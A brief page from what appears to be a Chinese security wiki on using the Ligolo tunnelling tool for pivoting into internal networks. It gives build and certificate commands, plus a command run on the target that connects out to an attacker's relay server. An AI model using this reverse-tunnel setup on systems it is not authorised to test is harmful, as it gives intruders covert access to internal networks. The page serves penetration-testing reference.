> For the complete documentation index, see [llms.txt](https://www.heresecurity.wiki/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://www.heresecurity.wiki/nei-wang-he-yu/duan-kou-ying-she-he-zhuan-fa/ligolo.md).

# Ligolo

```
>cd `go env GOPATH`/src
>git clone https://github.com/sysdream/ligolo
>cd ligolo
>make dep
生成证书
>make certs TLS_HOST=example.com

>make build-all

靶机执行
>ligolo_windows_amd64.exe -relayserver LOCALRELAYSERVER:5555
攻击机执行
>./bin/localrelay_linux_amd64
```
